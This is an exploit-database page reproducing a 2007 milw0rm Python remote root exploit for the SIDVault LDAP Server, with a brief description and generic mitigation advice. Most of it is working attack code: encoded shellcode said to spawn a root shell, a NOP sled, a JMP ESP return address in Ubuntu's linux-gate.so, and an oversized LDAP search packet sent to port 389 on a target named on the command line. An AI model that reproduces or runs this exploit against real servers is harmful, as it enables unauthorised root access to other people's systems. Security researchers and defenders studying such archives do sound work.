Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)

vendor:

SIDVault LDAP Server

by:

milw0rm.com

CVSS

CRITICAL

Remote Root Exploit

CWE

Product Name: SIDVault LDAP Server

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)

This is a remote root exploit for the Alpha Centauri Software SIDVault LDAP Server. It allows an attacker to gain root access to the server. The exploit uses a buffer overflow vulnerability to execute arbitrary code on the target system. It includes shellcode that will spawn a root shell. The exploit targets the JMP ESP address in Ubuntu's linux-gate.so library.

Mitigation:

Apply the latest patches and updates for the Alpha Centauri Software SIDVault LDAP Server. Disable unnecessary services and limit access to the server. Implement proper input validation to prevent buffer overflow vulnerabilities.

Source

Exploit-DB raw data:

#!/usr/bin/python

"""
Alpha Centauri Software SIDVault LDAP Server remote root exploit (0days)
"""

import sys
import socket

sc  = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x33\x4b\x4d\x43\x35"
sc += "\x43\x44\x43\x45\x4c\x56\x44\x30\x4c\x46\x48\x56\x4a\x45\x49\x49"
sc += "\x49\x38\x41\x4e\x4d\x4c\x42\x58\x48\x59\x43\x44\x44\x55\x48\x36"
sc += "\x4a\x36\x41\x31\x4e\x35\x48\x46\x43\x35\x49\x58\x41\x4e\x4c\x56"
sc += "\x48\x56\x4a\x55\x42\x45\x41\x55\x48\x35\x49\x48\x41\x4e\x4d\x4c"
sc += "\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x48\x44\x35"
sc += "\x44\x55\x48\x45\x43\x54\x49\x38\x41\x4e\x42\x4b\x48\x36\x4d\x4c"
sc += "\x42\x38\x43\x39\x4c\x46\x44\x30\x49\x55\x42\x4b\x4f\x43\x4d\x4c"
sc += "\x42\x38\x49\x54\x49\x47\x49\x4f\x42\x4b\x4b\x50\x44\x35\x4a\x46"
sc += "\x4f\x32\x4f\x42\x43\x57\x4a\x46\x4a\x36\x4f\x32\x44\x56\x49\x36"
sc += "\x50\x46\x49\x38\x43\x4e\x44\x45\x43\x35\x49\x58\x41\x4e\x4d\x4c"
sc += "\x42\x48\x5a"

#
# The address we will use is 0xffffe777 (JMP ESP in Ubuntu's linux-gate.so)
#
addr = "\x77\xe7\xff\xff"

theLine = '\x90'*2076 + addr+ '\x90'*(2019-len(sc)) + sc

pkt  = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
pkt += theLine
pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(pkt)
s.close()

# milw0rm.com [2007-08-25]